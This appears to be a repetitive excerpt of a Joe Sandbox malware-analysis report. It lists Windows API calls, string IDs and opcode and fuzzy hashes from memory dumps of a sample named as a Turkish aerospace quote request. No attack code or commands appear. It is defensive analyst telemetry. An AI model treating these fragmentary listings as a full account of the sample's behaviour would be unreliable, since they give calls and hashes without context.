                                                                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 4152858687-4108050209
                                                                                                                                    • Opcode ID: 23192a4efae3f1525debd141c9c4d8f80ea8a1e593e707ae0e27def02c18cdd5
                                                                                                                                    • Instruction ID: 72f41bb81f7ac7fe784808763486699913188921cec4575ed96af97a786c4fef
                                                                                                                                    • Opcode Fuzzy Hash: 23192a4efae3f1525debd141c9c4d8f80ea8a1e593e707ae0e27def02c18cdd5
                                                                                                                                    • Instruction Fuzzy Hash: B851DC712083059EF7A6DEA8C849A6BBBE8EF89350F040A6DF9C5D21D1DB74C9448B52
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FFD5D4
                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FFD60A
                                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FFD61B
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FFD69D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                    • Opcode ID: 20ca1c8114f6ed86f773168e3f27c4216f0d53dbf0f1b5f8989a70a26b93056a
                                                                                                                                    • Instruction ID: f80ea59fa7337ee73b5e1b127919b757058d0cb2df356e0ac48e131490d56142
                                                                                                                                    • Opcode Fuzzy Hash: 20ca1c8114f6ed86f773168e3f27c4216f0d53dbf0f1b5f8989a70a26b93056a
                                                                                                                                    • Instruction Fuzzy Hash: 6041AFB2600208EFDB15DF54C884AAA7BBAEF44314F1581A9EE09DF215D7B5DD40EBA0
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 010027C0
                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 010027DC
                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 01002822
                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01065890,00000000), ref: 0100286B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                                    • Opcode ID: fd6ade41b4dd2dc4169f7fb44fc69997826d1a8d662f7ebc520d3f4ac338190f
                                                                                                                                    • Instruction ID: b3c4892e15a426062dd68bf85ceaf1da34a80186edc88f3cb744dc4126d3a9c9
                                                                                                                                    • Opcode Fuzzy Hash: fd6ade41b4dd2dc4169f7fb44fc69997826d1a8d662f7ebc520d3f4ac338190f
                                                                                                                                    • Instruction Fuzzy Hash: D341A0752053029FE722DF28C848F6ABBE8EF85314F14496DFAA5972D1D730A605CB52
                                                                                                                                    APIs
                                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0101D7C5
                                                                                                                                      • Part of subcall function 00FA784B: _memmove.LIBCMT ref: 00FA7899
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharLower_memmove
                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                    • API String ID: 3425801089-567219261
                                                                                                                                    • Opcode ID: 0efdfa7bfcfe5dce731399431e5e08e45ef2eed2301f3338ff976396fdca60b2
                                                                                                                                    • Instruction ID: b74dec7a65c5d567807b07eb9b7f6a17c4723a6735c71ca2feeeb132c801e533
                                                                                                                                    • Opcode Fuzzy Hash: 0efdfa7bfcfe5dce731399431e5e08e45ef2eed2301f3338ff976396fdca60b2
                                                                                                                                    • Instruction Fuzzy Hash: 0B31B07190420AEBCF00EF98CC559EEB3B5FF05320B008659E8A9976D5DB39E905CB80
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FF8F14
                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FF8F27
                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FF8F57
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 365058703-1403004172
                                                                                                                                    • Opcode ID: 1554797bfbb496d49efb03944215f9126ef83c4aa8ff0d3ed6c89d0172a18787
                                                                                                                                    • Instruction ID: b12030a2be556af866a6cb4769bc0980607e7fa6d26bbbfcbf0d1c1c6a30a9f9
                                                                                                                                    • Opcode Fuzzy Hash: 1554797bfbb496d49efb03944215f9126ef83c4aa8ff0d3ed6c89d0172a18787
                                                                                                                                    • Instruction Fuzzy Hash: 7721D5B5A00109BEDB24ABB08C45DFFB779DF493A0F144519F955971E1DF3D480AB610
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101184C
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01011872
                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 010118A2
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 010118E9
                                                                                                                                      • Part of subcall function 01012483: GetLastError.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 01012498
                                                                                                                                      • Part of subcall function 01012483: SetEvent.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 010124AD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                    • Opcode ID: 43fd5fab9f5b564f7150085bf1316b9ee989889a10cec0ae5935da8dcf536d6d
                                                                                                                                    • Instruction ID: 828475eee851a34522e4e312a9770c3acfd0db540bd5549d3c312ef83794d03b
                                                                                                                                    • Opcode Fuzzy Hash: 43fd5fab9f5b564f7150085bf1316b9ee989889a10cec0ae5935da8dcf536d6d
                                                                                                                                    • Instruction Fuzzy Hash: 5E21B0B1500309BFEB259FA4DC84EBF77FDEB48684F10812AFA85D2144DB798D0597A1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                                                                                      • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                                                                                      • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01026461
                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 01026468
                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0102647D
                                                                                                                                    • DestroyWindow.USER32(?), ref: 01026485
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                                    • Opcode ID: aa4a56b391e2231cbace15384f2738a75b04089293781a9b976458e1c724b7d1
                                                                                                                                    • Instruction ID: 448664710f8c720a092376b449f01b557a167af4c66bb2ece7c7b7eb2df7a8c4
                                                                                                                                    • Opcode Fuzzy Hash: aa4a56b391e2231cbace15384f2738a75b04089293781a9b976458e1c724b7d1
                                                                                                                                    • Instruction Fuzzy Hash: 8A218E71100226ABEF214E68DC54EBB77EEEB49364F108669FED093091DB369C419760
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 01006DBC
                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006DEF
                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 01006E01
                                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01006E3B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                    • Opcode ID: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
                                                                                                                                    • Instruction ID: 5c92dff753687d1a1634bf86fbfe8eb982f0bb1ac907fdcd0f3305ac17fc8daa
                                                                                                                                    • Opcode Fuzzy Hash: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
                                                                                                                                    • Instruction Fuzzy Hash: 2E21657190030AABEB31AF29D804A9A7BF9EF45720F20465AFDE1D72D0D7729964CB50
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 01006E89
                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006EBB
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 01006ECC
                                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 01006F06
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                    • Opcode ID: a456e60df7737ea44d4a96b26407790c148c2d1444273ee9e97f07c2adb27ff4
                                                                                                                                    • Instruction ID: cb8671629d5c13721a06d3c54322c7c20ea60e8ac1df166889b59cffb00914c6
                                                                                                                                    • Opcode Fuzzy Hash: a456e60df7737ea44d4a96b26407790c148c2d1444273ee9e97f07c2adb27ff4
                                                                                                                                    • Instruction Fuzzy Hash: 3121907150034A9BFB319F6DD804AAA77E9AF45720F200A59FDE0D72C0D772A8618B60
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0100AC54
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0100ACA8
                                                                                                                                    • __swprintf.LIBCMT ref: 0100ACC1
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0102F910), ref: 0100ACFF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                    • String ID: %lu
                                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                                    • Opcode ID: ca7154fa73ffec96ae5cda672f7d184923f3749f9474913372702f42aa76cdb0
                                                                                                                                    • Instruction ID: c7cb02d55cc12ff263c10eba01beb63b1f47e995571e915328e04faa648ad8e9
                                                                                                                                    • Opcode Fuzzy Hash: ca7154fa73ffec96ae5cda672f7d184923f3749f9474913372702f42aa76cdb0
                                                                                                                                    • Instruction Fuzzy Hash: 8F219D70A0020AAFCB20DF65CD45DAF7BB8EF4A714B1040A9F949EB251DA75EA01DB21
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 01001B19
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                                    • Opcode ID: 4d1704c76b5dec7f9d41e78c03ad7befba3f8e938b3559fdd3e2d1b04ae16071
                                                                                                                                    • Instruction ID: 613eb35d8fcfd2867fd70e85ae3036b7ab733731a7c8c6a56b11a7c2b38a0c02
                                                                                                                                    • Opcode Fuzzy Hash: 4d1704c76b5dec7f9d41e78c03ad7befba3f8e938b3559fdd3e2d1b04ae16071
                                                                                                                                    • Instruction Fuzzy Hash: F9115E70900209CF9F41EF64DD529EEB7B4FF16308F108499DCA467296EB3A9906DB50
                                                                                                                                    APIs
                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0101EC07
                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0101EC37
                                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0101ED6A
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0101EDEB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2364364464-0
                                                                                                                                    • Opcode ID: 833dc8c64ff9d35d41ed332ecab786e3c51a5c9eaa73afc82beab45ef85fb59c
                                                                                                                                    • Instruction ID: b06fb78e6a74a559550530f205e25c9d35719386ad36aea14c4c757f5290f5d0
                                                                                                                                    • Opcode Fuzzy Hash: 833dc8c64ff9d35d41ed332ecab786e3c51a5c9eaa73afc82beab45ef85fb59c
                                                                                                                                    • Instruction Fuzzy Hash: AB8170B16043009FD761EF28CC86F2EB7E5AF45750F44882DF999DB292DAB8AC41CB51
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010200FD
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102013C
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01020183
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 010201AF
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 010201BC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3440857362-0
                                                                                                                                    • Opcode ID: 4611f82eb68c07f2e42fcd1a32b36072b98838b90dfdede43cdde339224f69b9
                                                                                                                                    • Instruction ID: 3e76dd712f2bcad6a2a9602c0c47b8ea55c2ff7d378d359225bd25486366b2f8
                                                                                                                                    • Opcode Fuzzy Hash: 4611f82eb68c07f2e42fcd1a32b36072b98838b90dfdede43cdde339224f69b9
                                                                                                                                    • Instruction Fuzzy Hash: EB516771208305AFD714EF68CC81EABB7E9AF84304F54492DF5898B2A1DB39E904DB52
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0101D927
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0101D9AA
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0101D9C6
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0101DA07
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0101DA21
                                                                                                                                      • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                                                                                      • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 327935632-0
                                                                                                                                    • Opcode ID: a6451ffb7674827a13c76dbf1f3cfb8d63ca7f4d512aad6dbb5013354565f627
                                                                                                                                    • Instruction ID: cc02507f981e4b4026c39040790400c02636d3a4c002e940859b0a6f3d438f3e
                                                                                                                                    • Opcode Fuzzy Hash: a6451ffb7674827a13c76dbf1f3cfb8d63ca7f4d512aad6dbb5013354565f627
